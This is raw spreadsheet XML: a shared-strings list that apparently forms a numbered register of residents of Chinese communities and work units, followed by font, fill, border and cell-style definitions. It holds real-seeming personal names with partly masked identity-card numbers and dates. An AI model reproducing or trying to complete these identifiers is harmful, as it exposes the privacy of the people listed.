    <t>2567</t>
  </si>
  <si>
    <t>张华林</t>
  </si>
  <si>
    <t>2568</t>
  </si>
  <si>
    <t>郝子菡</t>
  </si>
  <si>
    <t>411321********2021</t>
  </si>
  <si>
    <t>2569</t>
  </si>
  <si>
    <t>郝子轩</t>
  </si>
  <si>
    <t>411321********0197</t>
  </si>
  <si>
    <t>2570</t>
  </si>
  <si>
    <t>王博惠</t>
  </si>
  <si>
    <t>411321********4634</t>
  </si>
  <si>
    <t>2571</t>
  </si>
  <si>
    <t>王浩惠</t>
  </si>
  <si>
    <t>411321********0379</t>
  </si>
  <si>
    <t>2572</t>
  </si>
  <si>
    <t>向东厂</t>
  </si>
  <si>
    <t>张淑良</t>
  </si>
  <si>
    <t>2573</t>
  </si>
  <si>
    <t>张莲莲</t>
  </si>
  <si>
    <t>412921********1646</t>
  </si>
  <si>
    <t>2574</t>
  </si>
  <si>
    <t>吴建民</t>
  </si>
  <si>
    <t>2575</t>
  </si>
  <si>
    <t>王其西</t>
  </si>
  <si>
    <t>2576</t>
  </si>
  <si>
    <t>魏小建</t>
  </si>
  <si>
    <t>412921********1534</t>
  </si>
  <si>
    <t>2577</t>
  </si>
  <si>
    <t>张尚贵</t>
  </si>
  <si>
    <t>412921********1125</t>
  </si>
  <si>
    <t>2578</t>
  </si>
  <si>
    <t>李洪秀</t>
  </si>
  <si>
    <t>2579</t>
  </si>
  <si>
    <t>2580</t>
  </si>
  <si>
    <t>师小丽</t>
  </si>
  <si>
    <t>2581</t>
  </si>
  <si>
    <t>赵洋</t>
  </si>
  <si>
    <t>2582</t>
  </si>
  <si>
    <t>马爱则</t>
  </si>
  <si>
    <t>2583</t>
  </si>
  <si>
    <t>红宇社区</t>
  </si>
  <si>
    <t>张青芳</t>
  </si>
  <si>
    <t>412921********0802</t>
  </si>
  <si>
    <t>2584</t>
  </si>
  <si>
    <t>红宇厂</t>
  </si>
  <si>
    <t>王清荣</t>
  </si>
  <si>
    <t>2585</t>
  </si>
  <si>
    <t>李超</t>
  </si>
  <si>
    <t>411326********0759</t>
  </si>
  <si>
    <t>2586</t>
  </si>
  <si>
    <t>孟凡霞</t>
  </si>
  <si>
    <t>2587</t>
  </si>
  <si>
    <t>刘家伊</t>
  </si>
  <si>
    <t>2588</t>
  </si>
  <si>
    <t>王玉红</t>
  </si>
  <si>
    <t>2589</t>
  </si>
  <si>
    <t>郭雅宁</t>
  </si>
  <si>
    <t>411326********0720</t>
  </si>
  <si>
    <t>2590</t>
  </si>
  <si>
    <t>张建武</t>
  </si>
  <si>
    <t>2591</t>
  </si>
  <si>
    <t>郭桂香</t>
  </si>
  <si>
    <t>412921********0728</t>
  </si>
  <si>
    <t>2592</t>
  </si>
  <si>
    <t>刘春焕</t>
  </si>
  <si>
    <t>411326********0762</t>
  </si>
  <si>
    <t>2593</t>
  </si>
  <si>
    <t>邓佼</t>
  </si>
  <si>
    <t>411326********0719</t>
  </si>
  <si>
    <t>2594</t>
  </si>
  <si>
    <t>2595</t>
  </si>
  <si>
    <t>陈玉芬</t>
  </si>
  <si>
    <t>412921********0743</t>
  </si>
  <si>
    <t>2596</t>
  </si>
  <si>
    <t>邢嘉轩</t>
  </si>
  <si>
    <t>411321********0037</t>
  </si>
  <si>
    <t>2597</t>
  </si>
  <si>
    <t>张荣焕</t>
  </si>
  <si>
    <t>2598</t>
  </si>
  <si>
    <t>张富敏</t>
  </si>
  <si>
    <t>2599</t>
  </si>
  <si>
    <t>史春花</t>
  </si>
  <si>
    <t>2600</t>
  </si>
  <si>
    <t>张淑芳</t>
  </si>
  <si>
    <t>2601</t>
  </si>
  <si>
    <t>李宗刚</t>
  </si>
  <si>
    <t>412921********0773</t>
  </si>
  <si>
    <t>2602</t>
  </si>
  <si>
    <t>邱桂芝</t>
  </si>
  <si>
    <t>2603</t>
  </si>
  <si>
    <t>李鹊</t>
  </si>
  <si>
    <t>2604</t>
  </si>
  <si>
    <t>唐山林</t>
  </si>
  <si>
    <t>2605</t>
  </si>
  <si>
    <t>常杰勤</t>
  </si>
  <si>
    <t>2606</t>
  </si>
  <si>
    <t>勾长雪</t>
  </si>
  <si>
    <t>2607</t>
  </si>
  <si>
    <t>李学敏</t>
  </si>
  <si>
    <t>412921********2828</t>
  </si>
  <si>
    <t>2608</t>
  </si>
  <si>
    <t>关明慧</t>
  </si>
  <si>
    <t>411326********2087</t>
  </si>
  <si>
    <t>2609</t>
  </si>
  <si>
    <t>翟秀敏</t>
  </si>
  <si>
    <t>2610</t>
  </si>
  <si>
    <t>向东厂社区</t>
  </si>
  <si>
    <t>欧阳瑞昱</t>
  </si>
  <si>
    <t>2611</t>
  </si>
  <si>
    <t>刘尚钦</t>
  </si>
  <si>
    <t>2612</t>
  </si>
  <si>
    <t>郭建荣</t>
  </si>
  <si>
    <t>412924********0380</t>
  </si>
  <si>
    <t>2613</t>
  </si>
  <si>
    <t>张智皓</t>
  </si>
  <si>
    <t>411321********2010</t>
  </si>
  <si>
    <t>2024年7月</t>
  </si>
  <si>
    <t>2614</t>
  </si>
  <si>
    <t>孟令浩</t>
  </si>
  <si>
    <t>2615</t>
  </si>
  <si>
    <t>王嘉丽</t>
  </si>
  <si>
    <t>2616</t>
  </si>
  <si>
    <t>蔡昆朔</t>
  </si>
  <si>
    <t>411321********0376</t>
  </si>
  <si>
    <t>2617</t>
  </si>
  <si>
    <t>王英涵</t>
  </si>
  <si>
    <t>411321********6302</t>
  </si>
  <si>
    <t>2618</t>
  </si>
  <si>
    <t>凌佳如</t>
  </si>
  <si>
    <t>2619</t>
  </si>
  <si>
    <t>王中付</t>
  </si>
  <si>
    <t>412921********113X</t>
  </si>
  <si>
    <t>2620</t>
  </si>
  <si>
    <t>尹琮凯</t>
  </si>
  <si>
    <t>2621</t>
  </si>
  <si>
    <t>李岱</t>
  </si>
  <si>
    <t>2622</t>
  </si>
  <si>
    <t>高子涵</t>
  </si>
  <si>
    <t>411321********1521</t>
  </si>
  <si>
    <t>2623</t>
  </si>
  <si>
    <t>高子健</t>
  </si>
  <si>
    <t>411321********1518</t>
  </si>
  <si>
    <t>2624</t>
  </si>
  <si>
    <t>宋卫安</t>
  </si>
  <si>
    <t>2625</t>
  </si>
  <si>
    <t>张东阳</t>
  </si>
  <si>
    <t>2626</t>
  </si>
  <si>
    <t>杨玉香</t>
  </si>
  <si>
    <t>2627</t>
  </si>
  <si>
    <t>张汉发</t>
  </si>
  <si>
    <t>2628</t>
  </si>
  <si>
    <t>曹东升</t>
  </si>
  <si>
    <t>2629</t>
  </si>
  <si>
    <t>西北</t>
  </si>
  <si>
    <t>冯天改</t>
  </si>
  <si>
    <t>2630</t>
  </si>
  <si>
    <t>席云华</t>
  </si>
  <si>
    <t>2631</t>
  </si>
  <si>
    <t>郭鹏宇</t>
  </si>
  <si>
    <t>2632</t>
  </si>
  <si>
    <t>郭鹏菲</t>
  </si>
  <si>
    <t>411321********5145</t>
  </si>
  <si>
    <t>2633</t>
  </si>
  <si>
    <t>张玉</t>
  </si>
  <si>
    <t>411326********042X</t>
  </si>
  <si>
    <t>2634</t>
  </si>
  <si>
    <t>任保梅</t>
  </si>
  <si>
    <t>2635</t>
  </si>
  <si>
    <t>张晓红</t>
  </si>
  <si>
    <t>4113210706</t>
  </si>
  <si>
    <t>2636</t>
  </si>
  <si>
    <t>张恒源</t>
  </si>
  <si>
    <t>411321********1531</t>
  </si>
  <si>
    <t>2637</t>
  </si>
  <si>
    <t>大关居委会（麻绢厂）</t>
  </si>
  <si>
    <t>高英献</t>
  </si>
  <si>
    <t>2638</t>
  </si>
  <si>
    <t>郑怀春</t>
  </si>
  <si>
    <t>2025年7月</t>
  </si>
  <si>
    <t>2639</t>
  </si>
  <si>
    <t>马全旗</t>
  </si>
  <si>
    <t>2640</t>
  </si>
  <si>
    <t>赵振杰</t>
  </si>
  <si>
    <t>2641</t>
  </si>
  <si>
    <t>华祖平</t>
  </si>
  <si>
    <t>2642</t>
  </si>
  <si>
    <t>宏扬居委会</t>
  </si>
  <si>
    <t>曹喜三</t>
  </si>
  <si>
    <t>2643</t>
  </si>
  <si>
    <t>盆尧村居民组</t>
  </si>
  <si>
    <t>2644</t>
  </si>
  <si>
    <t>王小九</t>
  </si>
  <si>
    <t>2645</t>
  </si>
  <si>
    <t>杨茂玲</t>
  </si>
  <si>
    <t>2646</t>
  </si>
  <si>
    <t>王明朝</t>
  </si>
  <si>
    <t>2647</t>
  </si>
  <si>
    <t>杨树忠</t>
  </si>
  <si>
    <t>2648</t>
  </si>
  <si>
    <t>大关居委会      （云阳镇初中家属院）</t>
  </si>
  <si>
    <t>岳崇</t>
  </si>
  <si>
    <t>2649</t>
  </si>
  <si>
    <t>王圆庚</t>
  </si>
  <si>
    <t>411321********1513</t>
  </si>
  <si>
    <t>2650</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>南召店村</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（河东所集体户）</t>
    </r>
  </si>
  <si>
    <t>张爱佳</t>
  </si>
  <si>
    <t>411321********0341</t>
  </si>
  <si>
    <t>2651</t>
  </si>
  <si>
    <t>邢远东</t>
  </si>
  <si>
    <t>412921********0058</t>
  </si>
  <si>
    <t>2652</t>
  </si>
  <si>
    <t>居委会</t>
  </si>
  <si>
    <t>杨刚</t>
  </si>
  <si>
    <t>411321101203</t>
  </si>
  <si>
    <t>2653</t>
  </si>
  <si>
    <t>电线厂（中华社区办理）</t>
  </si>
  <si>
    <t>王志伟</t>
  </si>
  <si>
    <t>2654</t>
  </si>
  <si>
    <t>中华三组</t>
  </si>
  <si>
    <t>袁可</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</si>
</sst>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49">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="20"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="0"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>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9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="63"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="60"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="62"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="53">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.6"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor indexed="64"/>
      </patternFill>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indexed="31"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="44"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="27"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="11"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="42"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="29"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="46"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="45"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="47"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="20"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="30"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="51"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="26"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="49"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="22"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="52"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="43"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="23">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style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top/>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style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color indexed="8"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>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
      <left style="thin">
        <color indexed="22"/>
      </left>
      <right style="thin">
        <color indexed="22"/>
      </right>
      <top style="thin">
        <color indexed="22"/>
      </top>
      <bottom style="thin">
        <color indexed="22"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="thick">
        <color indexed="22"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color indexed="30"/>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style="thin">
        <color indexed="23"/>
      </left>
      <right style="thin">
        <color indexed="23"/>
      </right>
      <top style="thin">
        <color indexed="23"/>
      </top>
      <bottom style="thin">
        <color indexed="23"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="90">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="44" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="2" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="42" fontId="2" fillId="0" borderId="0" applyFon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 fillId="5" borderId="9" applyNumberFormat="0" applyFont="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10" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="10" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="11" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="6" borderId="12" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="7" borderId="13" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="7" borderId="12" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="8" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="15" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="16" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="18" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="19" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="25" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="27" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="28" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="30" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="33" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="35" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="36" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="37" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="48" borderId="17" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="18" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="0" borderId="19" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="50" borderId="20"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37" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="21" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="46" fillId="44" borderId="22" applyNumberFormat="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyNumberFormat="0" applyBorder="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
